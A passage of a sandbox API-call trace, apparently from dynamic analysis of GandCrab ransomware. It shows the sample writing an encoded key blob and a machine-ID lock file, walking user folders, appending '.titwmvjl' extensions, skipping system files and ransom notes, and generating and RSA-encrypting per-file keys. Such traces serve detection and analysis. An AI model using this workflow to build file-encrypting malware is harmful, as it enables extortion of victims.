\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0069.320] WriteFile (in: hFile=0x2cc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e824, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e824*=0x2162, lpOverlapped=0x0) returned 1 [0069.320] CloseHandle (hObject=0x2cc) returned 1 [0069.320] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.321] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.321] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xe, wMilliseconds=0x27d)) [0069.321] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.321] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0069.321] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0069.321] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\d2ca4a09d2ca4deb61a.lock") returned 87 [0069.321] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2cc [0069.323] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.323] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.324] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\") returned 63 [0069.324] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\*" [0069.324] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\*", fInfoLevelId=0x1, lpFindFileData=0x259e840, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e840) returned 0x503938 [0069.324] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.324] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0069.324] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.324] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.324] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0069.324] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0069.324] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0069.324] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\d2ca4a09d2ca4deb61a.lock" [0069.324] lstrlenW (lpString=".titwmvjl") returned 9 [0069.324] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\d2ca4a09d2ca4deb61a.lock") returned 87 [0069.324] VirtualAlloc (lpAddress=0x0, dwSize=0xee, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.324] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 96 [0069.324] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\d2ca4a09d2ca4deb61a.lock") returned 87 [0069.324] lstrlenW (lpString=".lock") returned 5 [0069.324] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.325] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0069.325] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.325] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.325] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0069.325] lstrcmpW (lpString1="GlobData", lpString2=".") returned 1 [0069.325] lstrcmpW (lpString1="GlobData", lpString2="..") returned 1 [0069.325] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\", lpString2="GlobData" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData" [0069.325] lstrlenW (lpString=".titwmvjl") returned 9 [0069.325] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData") returned 71 [0069.325] VirtualAlloc (lpAddress=0x0, dwSize=0xce, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.325] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData.titwmvjl") returned 80 [0069.325] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData") returned 71 [0069.325] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData") returned 71 [0069.325] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData") returned 71 [0069.325] lstrcmpiW (lpString1="GlobData", lpString2="desktop.ini") returned 1 [0069.325] lstrcmpiW (lpString1="GlobData", lpString2="autorun.inf") returned 1 [0069.325] lstrcmpiW (lpString1="GlobData", lpString2="ntuser.dat") returned -1 [0069.325] lstrcmpiW (lpString1="GlobData", lpString2="iconcache.db") returned -1 [0069.325] lstrcmpiW (lpString1="GlobData", lpString2="bootsect.bak") returned 1 [0069.325] lstrcmpiW (lpString1="GlobData", lpString2="boot.ini") returned 1 [0069.325] lstrcmpiW (lpString1="GlobData", lpString2="ntuser.dat.log") returned -1 [0069.325] lstrcmpiW (lpString1="GlobData", lpString2="thumbs.db") returned -1 [0069.326] lstrcmpiW (lpString1="GlobData", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0069.326] lstrcmpiW (lpString1="GlobData", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0069.326] lstrcmpiW (lpString1="GlobData", lpString2="KRAB-DECRYPT.html") returned -1 [0069.326] lstrcmpiW (lpString1="GlobData", lpString2="CRAB-DECRYPT.html") returned 1 [0069.326] lstrcmpiW (lpString1="GlobData", lpString2="KRAB-DECRYPT.txt") returned -1 [0069.326] lstrcmpiW (lpString1="GlobData", lpString2="CRAB-DECRYPT.txt") returned 1 [0069.326] lstrcmpiW (lpString1="GlobData", lpString2="ntldr") returned -1 [0069.326] lstrcmpiW (lpString1="GlobData", lpString2="NTDETECT.COM") returned -1 [0069.326] lstrcmpiW (lpString1="GlobData", lpString2="Bootfont.bin") returned 1 [0069.326] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData") returned 71 [0069.326] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.326] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\globdata"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0069.327] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0069.327] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.327] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0069.327] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.327] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.328] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.328] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0069.328] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.328] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.328] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.328] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.328] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0069.329] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.329] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.329] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.329] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0069.329] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.329] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.329] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.329] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.330] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0069.330] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.330] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503238) returned 1 [0069.330] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.330] CryptGetKeyParam (in: hKey=0x503238, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0069.330] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.330] CryptEncrypt (in: hKey=0x503238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0069.331] GetLastError () returned 0x0 [0069.331] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.331] CryptDestroyKey (hKey=0x503238) returned 1 [0069.331] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.331] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.332] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.332] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0069.332] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.332] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503738) returned 1 [0069.332] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.332] CryptGetKeyParam (in: hKey=0x503738, 